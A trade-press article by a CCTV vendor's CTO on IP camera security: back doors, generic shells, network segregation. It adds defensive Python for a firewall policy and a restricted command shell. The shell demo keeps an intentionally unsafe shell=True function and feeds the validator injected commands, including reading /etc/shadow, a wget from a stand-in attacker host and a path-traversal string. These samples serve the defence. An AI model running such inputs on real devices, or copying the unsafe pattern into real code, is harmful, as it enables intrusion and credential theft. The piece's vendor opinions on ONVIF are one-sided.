As traditional CCTV cameras are increasingly replaced by IP security cameras, and stories of them being hacked multiply, Mike Newton looks at the price of open IP security cameras.
The price of open IP security cameras?
The press is full of reports of IP CCTV cameras being hacked, and of suggestions that they have “back doors” built into them. What is clear is that, with the rise of the Internet of Things and the desire to get products to market as quickly and cheaply as possible, unnecessary vulnerabilities are being left in many devices. Mike Newton, Chief Technical Officer of NetVu Limited, examines those vulnerabilities from a technical perspective for Security News Desk and SecurityMiddleEast.com.
The concerns are twofold: that CCTV devices can be compromised by any attacker, and that generic open source services and libraries are being built into 'unattended' security appliances such as cameras, where nobody is watching for, or patching, the vulnerabilities those components carry. The position is far worse when a fixed root shell password is present that can be used as a ‘back door’, or when the device's generic default passwords are widely publicised. It is vital that a multi-tiered approach is taken to CCTV security. Segregation of networks is a key element, ideally with no direct network routing from camera endpoints to the corporate network or the public internet, combined with access permissions and stringent firewall rules.
The current 'default' Video Management System (VMS) driven approach has been woefully lacking in addressing these fundamental points. The principle has been that a central VMS provides camera configuration and management credentials, but the individual cameras are then accessed directly by users. Equally, the storage solution, an NVR or similar, accesses the IP cameras directly over the network.
The very fact that users and appliances talk to each other directly makes for a more troublesome firewall configuration, because there is a path between every user and every device, even when those devices are located in insecure locations outside the building. Some have adopted the solution of installing a separate CCTV network completely isolated from the main network, physically and operationally. This must surely be a retrograde step which fails to leverage the benefits of centralisation, and falls short of properly addressing the base technology architecture.
A favoured solution, used by NetVu, is a secure IP management layer which automatically creates VLANs fully segregated from the corporate network on a non-routable subnet; all access between users and the images then passes only through specific gateways that can be managed and controlled to limit any cyber-attack. This closed IP management layer is applied over and above a conventional IP infrastructure in order to provide the same specialised protection that closed-circuit wiring gave analogue CCTV.
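As an added illustration (example code written for this edit, not NetVu's product or any vendor's configuration), the following Python models the segregation just described as an explicit policy: cameras sit on a non-routable VLAN, a camera initiates nothing, and only a designated VMS/NVR gateway may open connections to the cameras, on the video service ports alone. `check_flow` evaluates a candidate connection against that policy and `nft_ruleset` renders the same policy as an nftables forward-chain fragment. The subnet, gateway address, interface name and port list are assumptions chosen for illustration.

```python
# Added example, not the article's or NetVu's code: a policy model of a
# closed camera VLAN reachable only through a VMS/NVR gateway.
# All addresses, interface names and ports below are assumed values.
import ipaddress

CAMERA_VLAN = ipaddress.ip_network("10.99.0.0/24")   # assumed camera subnet (not routed)
GATEWAYS = {ipaddress.ip_address("10.0.5.10")}       # assumed VMS/NVR gateway host(s)
CAMERA_PORTS = {80, 443, 554}                        # HTTP, HTTPS, RTSP on the cameras


def check_flow(src, dst, dport):
    """Return True if a NEW connection src -> dst:dport is permitted.

    Rules, in order:
      1. Traffic not touching the camera VLAN is outside this policy (allowed here).
      2. A camera never initiates anything: not to the corporate network, not to
         the internet, not to another camera.
      3. Into the camera VLAN, only a listed gateway may connect, and only to the
         video/management service ports. Telnet, SSH, etc. are refused even for it.
    """
    src, dst = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    src_is_cam, dst_is_cam = src in CAMERA_VLAN, dst in CAMERA_VLAN
    if not (src_is_cam or dst_is_cam):
        return True
    if src_is_cam:
        return False
    return src in GATEWAYS and dport in CAMERA_PORTS


def nft_ruleset(cam_iface="vlan99"):
    """Render the same policy as an nftables fragment for the router that
    carries the camera VLAN (the interface name is assumed)."""
    gws = ", ".join(str(g) for g in sorted(GATEWAYS))
    ports = ", ".join(str(p) for p in sorted(CAMERA_PORTS))
    return (
        "table inet cctv {\n"
        "  chain forward {\n"
        "    type filter hook forward priority 0; policy drop;\n"
        "    ct state established,related accept\n"
        f'    iif "{cam_iface}" drop\n'                                  # cameras initiate nothing
        f'    oif "{cam_iface}" ip saddr {{ {gws} }} tcp dport {{ {ports} }} accept\n'
        "  }\n"
        "}\n"
    )


if __name__ == "__main__":
    for flow in [("10.0.5.10", "10.99.0.20", 554),     # gateway pulls RTSP: allowed
                 ("10.0.7.33", "10.99.0.20", 80),      # ordinary user direct to camera: refused
                 ("10.99.0.20", "198.51.100.7", 443),  # camera calling out to the internet: refused
                 ("10.0.5.10", "10.99.0.20", 23)]:     # gateway to telnet on a camera: refused
        print(flow, "ALLOW" if check_flow(*flow) else "DROP")
    print(nft_ruleset())
```

Two caveats a practitioner would add. The forward hook only sees traffic that crosses the router, so camera-to-camera traffic within the VLAN must be stopped on the switch with port isolation (a private or isolated VLAN). And because the gateway is now the single route to every camera, it becomes the host to harden, patch and monitor most carefully.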
The drive for open standards and interoperability, championed by ONVIF and others, exists only for commercial supply-chain convenience and is, in fact, directly contradictory to the needs of overall security. The use of generic services, and on occasion 'root level' back doors, most often left in by accident, means that devices can be compromised in a totally generic manner, with no specific knowledge of that particular device’s operation or architecture. Rather than simply using generic services that leave a massive attack surface open, manufacturers should implement their own command-line shell structures limited to the relevant needs only.
As a minimum, a customised protocol layer should be placed in front of any service, exposing only those functions that are explicitly required, rather than the complete freedom of, for example, a Linux 'bash' shell, which allows the loading of malicious firmware, the alteration of access credentials and complete system access.
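To make the contrast in the two paragraphs above concrete, here is an added example (written for this edit; not the article's, NetVu's or any camera vendor's code) of a maintenance interface done both ways: one that hands operator text to `/bin/sh`, and one that exposes a fixed, validated command set with no verb for firmware upload, credential change or arbitrary execution. The command names, argument rules and the device state are assumptions chosen for illustration.

```python
# Added example, not the article's or any vendor's code: a maintenance
# interface exposing a fixed, validated command set instead of a shell.
# Command names, argument rules and the device state are assumptions.
import re
import shlex
import subprocess


def run_unrestricted(line):
    """The pattern the article argues against: operator text goes straight
    to /bin/sh. 'status; cat /etc/shadow' or 'status; wget ... && sh fw.sh'
    is just another command line here."""
    return subprocess.run(line, shell=True, capture_output=True, text=True).stdout


class CommandError(Exception):
    """Raised for anything outside the allow-listed, validated command set."""


class DeviceShell:
    """Only the verbs in ALLOWED exist; each verb validates its own arguments.
    There is no verb for firmware upload, credential change or arbitrary
    execution, so those capabilities are simply unreachable from this layer."""

    ALLOWED = ("status", "stream")
    _ID = re.compile(r"^[A-Za-z0-9_-]{1,32}$")   # assumed stream-identifier charset

    def __init__(self):
        # Constructed device state standing in for real configuration.
        self.state = {"firmware": "1.4.2", "stream": {"cam1": "on", "cam2": "on"}}

    def execute(self, line):
        try:
            tokens = shlex.split(line)
        except ValueError as exc:            # unbalanced quotes etc.
            raise CommandError(f"bad quoting: {exc}")
        if not tokens:
            raise CommandError("empty command")
        verb, args = tokens[0], tokens[1:]
        if verb not in self.ALLOWED:         # 'status;', 'bash', 'sh' all end here
            raise CommandError(f"unknown command {verb!r}")
        return getattr(self, "cmd_" + verb)(args)

    def cmd_status(self, args):
        if args:
            raise CommandError("usage: status")
        return f"firmware {self.state['firmware']}; streams {self.state['stream']}"

    def cmd_stream(self, args):
        # stream <id> on|off : the id must match _ID, so path-like or shell-like
        # text is refused before it reaches any lookup.
        if len(args) != 2 or not self._ID.match(args[0]) or args[1] not in ("on", "off"):
            raise CommandError("usage: stream <id> on|off")
        if args[0] not in self.state["stream"]:
            raise CommandError(f"unknown stream {args[0]!r}")
        self.state["stream"][args[0]] = args[1]
        return f"stream {args[0]} {args[1]}"


def handle(shell, line):
    """Convenience wrapper: (accepted, message) instead of an exception."""
    try:
        return True, shell.execute(line)
    except CommandError as exc:
        return False, str(exc)


if __name__ == "__main__":
    dev = DeviceShell()
    for line in ["status", "stream cam1 off",
                 "status; cat /etc/shadow",
                 "stream cam1 on; wget http://attacker.invalid/fw.bin",
                 "stream ../../etc/passwd on", "bash"]:
        print(f"{line!r:55} -> {handle(dev, line)}")
```

The point of the design is that the restricted layer does not try to recognise attacks; it recognises only the handful of commands the appliance needs, and everything else, including a shell metacharacter glued to a valid verb, is rejected as an unknown command.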
While any solution can be hacked given sufficient time and knowledge, what 'standardisation' such as ONVIF has created is a platform on which a single hacking tool, its creation assisted by masses of public information and open source software, can compromise the majority of cameras using the same techniques. Having to create an individual tool for each family of devices, with a far lower return on the effort, is a much greater impediment to the widespread availability of such tools.
For some time, poorly controlled IP surveillance devices have represented a grave risk of becoming the 'enemy within'. The rise of often haphazardly deployed Internet of Things (IoT) devices, also shipped with default user credentials, will make this situation worse: they share the same basic operating systems and interfaces as other IP devices, so the scope for your IP surveillance devices being 'recruited' into a botnet is increasing daily.
All manufacturers should promote well-defined, easy to implement defensive measures as an implicit and fundamental part of their solution, protecting both the user and the IP appliances themselves from such attacks, whether they originate from a state-owned entity or any other cyber attacker.
Any solution that relies on, or hands out, routable corporate IP addresses for individual IP surveillance appliances should be treated with the highest levels of caution, and this applies to the vast majority of VMS-based solutions on the market. The latest media attention brings these issues into focus; users should act now to review their systems and deploy IP systems designed so that whatever vulnerabilities the cameras contain cannot be reached in the first place.